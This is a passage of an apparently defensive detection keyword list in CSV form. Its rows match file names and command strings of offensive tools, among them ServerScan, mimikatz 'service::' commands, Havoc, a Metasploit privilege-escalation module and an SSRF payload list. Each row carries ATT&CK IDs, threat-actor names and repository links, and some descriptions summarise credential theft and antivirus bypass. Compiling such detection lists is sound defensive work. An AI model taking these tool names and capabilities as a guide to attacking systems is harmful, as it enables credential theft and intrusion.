T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - 
APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*serverscan_386.exe*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*ServerScan_Air_*.exe*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*ServerScan_Air_*_amd64*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*ServerScan_Air_*_i386*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*serverscan_air-probes.exe*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*serverscan_amd64.exe*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*ServerScan_Pro_*.exe*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in 
Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*ServerScan_Pro_*_amd64*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - 
Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*ServerScan_Pro_*_i386*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*serverscan64 *,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 
- T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,0,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*serverscan64 *tcp*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/Adminisme/ServerScan,1,0,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*serverscan86 *,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,0,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*Server-Side-Request-Forgery-Payloads.*,offensive_tool_keyword,Offensive-Payloads,List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.,T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ,TA0001 - TA0002 - TA0009,N/A,N/A,List,https://github.com/InfoSecWarrior/Offensive-Payloads/,1,1,N/A,N/A,2,116,43,2023-09-11T17:20:51Z,2022-11-18T09:43:41Z -*service/executable/,offensive_tool_keyword,C2 related tools,An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - 
T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Ed1s0nZ/cool,1,1,N/A,10,10,668,113,2023-07-13T07:04:30Z,2021-11-10T14:32:34Z -*service/executable/compile.exe*,offensive_tool_keyword,C2 related tools,An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Ed1s0nZ/cool,1,1,N/A,10,10,668,113,2023-07-13T07:04:30Z,2021-11-10T14:32:34Z -*service::me*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. 
mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*service::preshutdown*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*service::remove*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*service::resume*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*service::shutdown*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*service::start*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*service::stop*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*service::suspend*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*service_permissions_escalate.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ServiceHavoc.exe,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*servicemove*hid.dll*,offensive_tool_keyword,cobaltstrike,New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
